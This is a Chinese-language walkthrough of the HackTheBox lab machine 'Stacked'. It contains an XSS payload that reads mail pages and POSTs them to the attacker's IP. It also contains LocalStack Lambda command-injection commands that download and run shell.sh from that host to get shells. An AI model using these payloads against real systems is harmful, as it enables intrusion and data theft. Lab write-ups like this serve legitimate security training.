Stacked - HackTheBox

基本信息

• https://www.hackthebox.com/home/machines/profile/379
• 10.10.11.112

端口扫描

22,80,2376(全端口能扫到):

$ nmap -sC -sV 10.10.11.112
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 10:45 CST
Nmap scan report for 10.10.11.112
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 12:8f:2b:60:bc:21:bd:db:cb:13:02:03:ef:59:36:a5 (RSA)
|   256 af:f3:1a:6a:e7:13:a9:c0:25:32:d0:2c:be:59:33:e4 (ECDSA)
|_  256 39:50:d5:79:cd:0e:f0:24:d3:2c:f4:23:ce:d2:a6:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://stacked.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: stacked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.57 seconds

$ nmap -p 2376 -sC -sV 10.10.11.112
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 10:53 CST
Nmap scan report for stacked.htb (10.10.11.112)
Host is up (0.18s latency).

PORT     STATE SERVICE     VERSION
2376/tcp open  ssl/docker?
| ssl-cert: Subject: commonName=0.0.0.0
| Subject Alternative Name: DNS:localhost, DNS:stacked, IP Address:0.0.0.0, IP Address:127.0.0.1, IP Address:172.17.0.1
| Not valid before: 2021-07-17T15:37:02
|_Not valid after:  2022-07-17T15:37:02

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.63 seconds

80

需要加hosts：

10.10.11.112 stacked.htb

子域名

子域名可以扫到portfolio，同样加hosts：

gobuster vhost -u http://stacked.htb/ -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -k -t 50 | grep 200
Found: portfolio.stacked.htb (Status: 200) [Size: 30268]

portfolio.stacked.htb

Localstack

Localstack

页面可以下载docker-compose.yml文件：

docker-compose.yml

version: "3.3"

services:
  localstack:
    container_name: "${LOCALSTACK_DOCKER_NAME-localstack_main}"
    image: localstack/localstack-full:0.12.6
    network_mode: bridge
    ports:
      - "127.0.0.1:443:443"
      - "127.0.0.1:4566:4566"
      - "127.0.0.1:4571:4571"
      - "127.0.0.1:${PORT_WEB_UI-8080}:${PORT_WEB_UI-8080}"
    environment:
      - SERVICES=serverless
      - DEBUG=1
      - DATA_DIR=/var/localstack/data
      - PORT_WEB_UI=${PORT_WEB_UI- }
      - LAMBDA_EXECUTOR=${LAMBDA_EXECUTOR- }
      - LOCALSTACK_API_KEY=${LOCALSTACK_API_KEY- }
      - KINESIS_ERROR_PROBABILITY=${KINESIS_ERROR_PROBABILITY- }
      - DOCKER_HOST=unix:///var/run/docker.sock
      - HOST_TMP_FOLDER="/tmp/localstack"
    volumes:
      - "/tmp/localstack:/tmp/localstack"
      - "/var/run/docker.sock:/var/run/docker.sock"

XSS

contact那里可以发邮件，存在xss检测：

实际可用的xss触发点在referer那里，这个需要试行错误：

mail

监测收到的请求信息，可以发现来自mail子域名,id=2：

有2就有1，尝试通过xss获取1的内容：

s3

根据得到的内容，发现aws s3

id1.js

var fetch_req = new XMLHttpRequest();
fetch_req.onreadystatechange = function() {
	if(this.readyState == 4 && fetch_req.readyState == XMLHttpRequest.DONE) {
		var exfil_req = new XMLHttpRequest();
		exfil_req.open("POST", "http://10.10.14.5:7778", false);
		exfil_req.send("Resp Code: " + fetch_req.status + "\nPage Source:\n" +
			fetch_req.response);
	}
};
fetch_req.open("GET", "http://mail.stacked.htb/read-mail.php?id=1", false);
fetch_req.send();

AWS S3

得到的s3域名加hosts，可以外部访问：

s3-testing.stacked.htb

根据已有信息搜索：

• Hack the Stack with LocalStack: Code Vulnerabilities Explained
  https://blog.sonarsource.com/hack-the-stack-with-localstack

可以通过lambda函数进行命令注入

lambda to shell

后续就是根据文档，创建lambda函数，在function-name参数中注入命令：

• create-function — AWS CLI 1.22.79 Command Reference
  https://docs.aws.amazon.com/cli/latest/reference/lambda/create-function.html

创建函数，函数名命令注入，xss重定向到对应界面触发命令注入：

zip index.zip index.js 

aws lambda --endpoint=http://s3-testing.stacked.htb create-function  \
 --function-name "api;wget\${IFS}10.10.14.5/shell.sh;bash\${IFS}shell.sh" \
 --runtime nodejs12.x \
 --handler index.handler \
 --memory-size 128 \
 --zip-file fileb://index.zip \
 --role arn:aws:iam::123456789012:role/lambda-role

index.js

exports.handler =  async function(event, context) {
  console.log("EVENT: \n" + JSON.stringify(event, null, 2))
  return context.logStreamName
}

user flag

现在是在容器内，localstack用户目录得到user.txt:

localstack root

在当前容器内运行pspy64之类，会发现创建lambda的时候它内部调用了unzip后，调用docker命令使用了我们创建lambda时的一些参数，这里直接用0xdf的结果了：

2021/08/25 20:28:45 CMD: UID=0    PID=990    | unzip -o -q /tmp/localstack/zipfile.83615cde/original_lambda_archive.zip
2021/08/25 20:30:59 CMD: UID=0    PID=1003   | /bin/sh -c CONTAINER_ID="$(docker create -i   -e DOCKER_LAMBDA_USE_STDIN="$DOCKER_LAMBDA_USE_STDIN" -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME" -e EDGE_PORT="$EDGE_PORT" -e _HANDLER="$_HANDLER" -e AWS_LAMBDA_FUNCTION_TIMEOUT="$AWS_LAMBDA_FUNCTION_TIMEOUT" -e AWS_LAMBDA_FUNCTION_NAME="$AWS_LAMBDA_FUNCTION_NAME" -e AWS_LAMBDA_FUNCTION_VERSION="$AWS_LAMBDA_FUNCTION_VERSION" -e AWS_LAMBDA_FUNCTION_INVOKED_ARN="$AWS_LAMBDA_FUNCTION_INVOKED_ARN" -e AWS_LAMBDA_COGNITO_IDENTITY="$AWS_LAMBDA_COGNITO_IDENTITY" -e NODE_TLS_REJECT_UNAUTHORIZED="$NODE_TLS_REJECT_UNAUTHORIZED"   --rm "lambci/lambda:nodejs12.x" "index.handler")";docker cp "/tmp/localstack/zipfile.4ef57e23/." "$CONTAINER_ID:/var/task"; docker start -ai "$CONTAINER_ID"; 
2021/08/25 20:30:59 CMD: UID=0    PID=1002   | /bin/sh -c CONTAINER_ID="$(docker create -i   -e DOCKER_LAMBDA_USE_STDIN="$DOCKER_LAMBDA_USE_STDIN" -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME" -e EDGE_PORT="$EDGE_PORT" -e _HANDLER="$_HANDLER" -e AWS_LAMBDA_FUNCTION_TIMEOUT="$AWS_LAMBDA_FUNCTION_TIMEOUT" -e AWS_LAMBDA_FUNCTION_NAME="$AWS_LAMBDA_FUNCTION_NAME" -e AWS_LAMBDA_FUNCTION_VERSION="$AWS_LAMBDA_FUNCTION_VERSION" -e AWS_LAMBDA_FUNCTION_INVOKED_ARN="$AWS_LAMBDA_FUNCTION_INVOKED_ARN" -e AWS_LAMBDA_COGNITO_IDENTITY="$AWS_LAMBDA_COGNITO_IDENTITY" -e NODE_TLS_REJECT_UNAUTHORIZED="$NODE_TLS_REJECT_UNAUTHORIZED"   --rm "lambci/lambda:nodejs12.x" "index.handler")";docker cp "/tmp/localstack/zipfile.4ef57e23/." "$CONTAINER_ID:/var/task"; docker start -ai "$CONTAINER_ID"; 
2021/08/25 20:30:59 CMD: UID=0    PID=1010   | /bin/sh -c CONTAINER_ID="$(docker create -i   -e DOCKER_LAMBDA_USE_STDIN="$DOCKER_LAMBDA_USE_STDIN" -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME" -e EDGE_PORT="$EDGE_PORT" -e _HANDLER="$_HANDLER" -e AWS_LAMBDA_FUNCTION_TIMEOUT="$AWS_LAMBDA_FUNCTION_TIMEOUT" -e AWS_LAMBDA_FUNCTION_NAME="$AWS_LAMBDA_FUNCTION_NAME" -e AWS_LAMBDA_FUNCTION_VERSION="$AWS_LAMBDA_FUNCTION_VERSION" -e AWS_LAMBDA_FUNCTION_INVOKED_ARN="$AWS_LAMBDA_FUNCTION_INVOKED_ARN" -e AWS_LAMBDA_COGNITO_IDENTITY="$AWS_LAMBDA_COGNITO_IDENTITY" -e NODE_TLS_REJECT_UNAUTHORIZED="$NODE_TLS_REJECT_UNAUTHORIZED"   --rm "lambci/lambda:nodejs12.x" "index.handler")";docker cp "/tmp/localstack/zipfile.4ef57e23/." "$CONTAINER_ID:/var/task"; docker start -ai "$CONTAINER_ID";

命令注入

可以直接通过命令注入运行我们前面的shell，只是运行用户的权限不同了：

aws lambda create-function --function-name shell --handler 'index.handler;$(bash /opt/code/localstack/shell.sh)' --zip-file fileb://index.zip --role arn:aws:iam::123456789012:role/lambda-role --endpoint-url http://s3-testing.stacked.htb --runtime nodejs12.x

aws lambda invoke --function-name shell --endpoint-url http://s3-testing.stacked.htb out.json

提权信息

容器内root可以运行docker相关命令进行枚举：

提权 & root flag

常规的容器挂载逃逸：

参考资料

• Hack the Stack with LocalStack: Code Vulnerabilities Explained
  https://blog.sonarsource.com/hack-the-stack-with-localstack
• create-function — AWS CLI 1.22.79 Command Reference
  https://docs.aws.amazon.com/cli/latest/reference/lambda/create-function.html
• HTB: Stacked | 0xdf hacks stuff
  https://0xdf.gitlab.io/2022/03/19/htb-stacked.html
• https://www.hackthebox.com/home/machines/writeup/379
• HackTheBox - Stacked - YouTube
  https://www.youtube.com/watch?v=aWXfEDIYZu8&ab_channel=IppSec